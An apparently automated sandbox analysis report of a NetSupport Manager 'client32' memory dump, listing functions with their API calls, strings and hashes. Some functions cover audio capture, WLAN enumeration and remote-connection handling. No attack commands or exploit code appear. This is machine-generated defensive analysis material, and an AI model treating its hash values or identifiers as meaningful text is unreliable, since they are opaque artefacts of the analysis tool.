String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 3341947355-3231647555
Opcode ID: f8bda756cb3285b568cf2e1b703939da673dd6c497a554ea4ca33949165420d3
Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
Opcode Fuzzy Hash: f8bda756cb3285b568cf2e1b703939da673dd6c497a554ea4ca33949165420d3
Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61

Function 1102B920 Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetLastError.KERNEL32(?), ref: 1102BA81
GetLastError.KERNEL32(?), ref: 1102BADE
_fgets.LIBCMT ref: 1102BB10
_strtok.LIBCMT ref: 1102BB38

Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4

_fgets.LIBCMT ref: 1102BB74
_strtok.LIBCMT ref: 1102BB88

Strings

LookupFileUser, xrefs: 1102BA4A
IsA(), xrefs: 1102B9D6, 1102BAB3
WARN: clientname is empty!, xrefs: 1102BBE8
*LookupFile, xrefs: 1102B9A8
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102B9D1, 1102BAAE
8zi, xrefs: 1102BA56, 1102BBC2
WARN: No TS lookup file specified!, xrefs: 1102B9ED
WARN: Could not open TS lookup file: "%s" (%d), user="%s", xrefs: 1102BAF1
WARN: LoginUser failed (%d) user="%s", xrefs: 1102BA88

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
String ID: *LookupFile$8zi$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 78526175-3989040611
Opcode ID: 7ecfdd4b06a90f1641a5c463ce73745ce1a0de07f4108bd647be037c59f82d68
Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
Opcode Fuzzy Hash: 7ecfdd4b06a90f1641a5c463ce73745ce1a0de07f4108bd647be037c59f82d68
Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91

Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1104702F
wsprintfA.USER32 ref: 110470AE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

wsprintfA.USER32 ref: 110470E9
GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
_strrchr.LIBCMT ref: 1104720C
GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
_free.LIBCMT ref: 11047251

Strings

V12.10F20, xrefs: 110470FA, 110471A5
NSA %s, xrefs: 110470A8
V12.00, xrefs: 110470D2
%s %s, xrefs: 110470BA, 110470E0
CLTCONN.CPP, xrefs: 11047042
NSS, xrefs: 1104708E
V12.10, xrefs: 110470D9, 110470DE
V1.10, xrefs: 1104709C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
API String ID: 1757445300-1785190265
Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2

Function 1100B440 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

_malloc.LIBCMT ref: 1100B496

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,B6DE5DE1,?,00000000,00000000), ref: 1100AD54
Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45

EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,B6DE5DE1,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
_calloc.LIBCMT ref: 1100B519
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E

Strings

Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
\\.\NSAudioFilter, xrefs: 1100B4E0
Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
Audio, xrefs: 1100B477
InitCaptureSounds NT6, xrefs: 1100B5BE
DisableSounds, xrefs: 1100B472
Vista new pAudioCap=%p, xrefs: 1100B603

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
API String ID: 1843377891-2362500394
Opcode ID: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
Opcode Fuzzy Hash: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1

Function 110537C0 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 360COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 11053A8A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11041F40: inet_ntoa.WSOCK32(?,?,?,?,110539A4,00000000,?,?,B6DE5DE1,?,?), ref: 11041F52

Strings

Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x], xrefs: 11053ADA
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11053836, 11053886, 110539D3, 11053A5A, 11053AB8, 11053B2B, 11053B6F, 11053BB6, 11053BF4
8zi, xrefs: 11053AF0
NSTWControl32, xrefs: 11053BD7
TCPIP, xrefs: 110538E1, 11053A18, 11053A33
port, xrefs: 110538DC
IsA(), xrefs: 1105383B, 1105388B, 110539D8, 11053A5F, 11053ABD, 11053B30, 11053B74, 11053BBB, 11053BF9
Announce Error from %s. Invalid crc - ignoring, xrefs: 1105384C
Port, xrefs: 11053A13
NSMWControl32, xrefs: 11053B90
%s:%u, xrefs: 11053948
ListenPort, xrefs: 11053A2E
NSSWControl32, xrefs: 11053B4C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
String ID: %s:%u$8zi$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
API String ID: 3701541597-3808784652
Opcode ID: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
Opcode Fuzzy Hash: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61

Function 11031820 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 245sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,B6DE5DE1,00000000,00000000,00000000), ref: 1103185A

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

EnumWindows.USER32(11030850,00000001), ref: 11031932
EnumWindows.USER32(11030850,00000000), ref: 1103198C
Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 1103199C
Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 110319D3

Part of subcall function 11028450: _memset.LIBCMT ref: 11028485
Part of subcall function 11028450: wsprintfA.USER32 ref: 110284BA
Part of subcall function 11028450: WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
Part of subcall function 11028450: GetExitCodeProcess.KERNEL32(?,?), ref: 11028513
Part of subcall function 11028450: CloseHandle.KERNEL32(?,00000000), ref: 11028545
Part of subcall function 11028450: CloseHandle.KERNEL32(?), ref: 1102854E

Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 110319EB
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 11031AA7

Strings

\Explorer.exe, xrefs: 1103189A
Client, xrefs: 11031877
close new explorer wnd x%x, xrefs: 11031A6F
8zi, xrefs: 11031958
"%sNSMExec.exe" %s, xrefs: 11031945
No new explorer wnd, xrefs: 110319B3
*ExitMetroDelay, xrefs: 11031872

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$8zi$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
API String ID: 3887438110-249657181
Opcode ID: 64a2aecee1807f9fb40f95f5304c27bfd5877d9b493d897ae698ee801fedc084
Instruction ID: e4a431c807ee13d88d7f5229128d7dd46b9a7d2a7c1cad66ff6ecfc7424b804f
Opcode Fuzzy Hash: 64a2aecee1807f9fb40f95f5304c27bfd5877d9b493d897ae698ee801fedc084
Instruction Fuzzy Hash: 9D919D75E002299FDB14CF64CC80BEEF7F5AF89309F1441A9D9599B240EB31AE81CB91

Function 11059B00 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 243windowCOMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11059C29
CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 11059C3A
DeleteObject.GDI32(?), ref: 11059C4B
PostMessageA.USER32(00000000,00000800,00000000,00000000), ref: 11059CB6
GetCursorPos.USER32(?), ref: 11059CED

Part of subcall function 110585A0: GetTickCount.KERNEL32 ref: 11058616

Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5

GetDC.USER32(00000000), ref: 11059CBE
GetPixel.GDI32(00000000,00000000,00000000), ref: 11059CCB
SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 11059CD7
ReleaseDC.USER32(00000000,00000000), ref: 11059CE0
GetSystemMetrics.USER32(0000004C), ref: 11059D2B
GetSystemMetrics.USER32(0000004D), ref: 11059D31
GetTickCount.KERNEL32 ref: 11059D9D
_free.LIBCMT ref: 11059E20

Strings

8zi, xrefs: 11059CFB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CountPixelTick$CombineCreateCursorDeleteMessageObjectPostRectRelease_free
String ID: 8zi
API String ID: 4025550384-881272250
Opcode ID: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
Instruction ID: abc6ed23ccba68bf9f12691c10e6e213c1dc765ac58f2aea97efe2483c19e439
Opcode Fuzzy Hash: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
Instruction Fuzzy Hash: 41A1A271E007099FEBA5DF64C984BEABBF8BF49304F10456DE51A97284EB70A980CF50

Function 11027B20 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 174windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000,00000009,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BB0
LoadIconA.USER32(00000000,00007D0B), ref: 11027BC5
GetSystemMetrics.USER32(00000032), ref: 11027BDE
GetSystemMetrics.USER32(00000031), ref: 11027BE3
LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027BF3
LoadIconA.USER32(11000000,00000491), ref: 11027C0B
GetSystemMetrics.USER32(00000032), ref: 11027C1A
GetSystemMetrics.USER32(00000031), ref: 11027C1F
LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027C30

Strings

PCIRES, xrefs: 11027BAB
_License, xrefs: 11027B5D
NSM.LIC, xrefs: 11027B31
AdminUserAcknowledge, xrefs: 11027C8B
product, xrefs: 11027B58

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
String ID: AdminUserAcknowledge$NSM.LIC$PCIRES$_License$product
API String ID: 1946015-4092316048
Opcode ID: 7b6417ce7b3594b7669bd5d6d24d0fb252bf9abee04dc108a4f179c77e3cc1ac
Instruction ID: b61cf272041b3986789d5db62e37e05cd74fdd835a4c3c17a37838dc7586d827
Opcode Fuzzy Hash: 7b6417ce7b3594b7669bd5d6d24d0fb252bf9abee04dc108a4f179c77e3cc1ac
Instruction Fuzzy Hash: 4D51D8B5F4061A6BE711CBB08D81F6FB6ACAF54758F500469FA05E7680EB70E900C7A2

Function 1115B5D0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11058627), ref: 1115B61B
GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
std::exception::exception.LIBCMT ref: 1115B68D
__CxxThrowException@8.LIBCMT ref: 1115B6A2

Strings

wlanapi.dll, xrefs: 1115B613
WlanGetAvailableNetworkList, xrefs: 1115B65E
WlanOpenHandle, xrefs: 1115B62E
WlanFreeMemory, xrefs: 1115B66E
WlanEnumInterfaces, xrefs: 1115B64E
WlanCloseHandle, xrefs: 1115B63E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
API String ID: 2439742961-1736626566
Opcode ID: 6cb80e4ba42ffe2f6d3fe0fc7e02658a82289641e696ec289b07654b65deaaf3
Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
Opcode Fuzzy Hash: 6cb80e4ba42ffe2f6d3fe0fc7e02658a82289641e696ec289b07654b65deaaf3
Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95

Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON

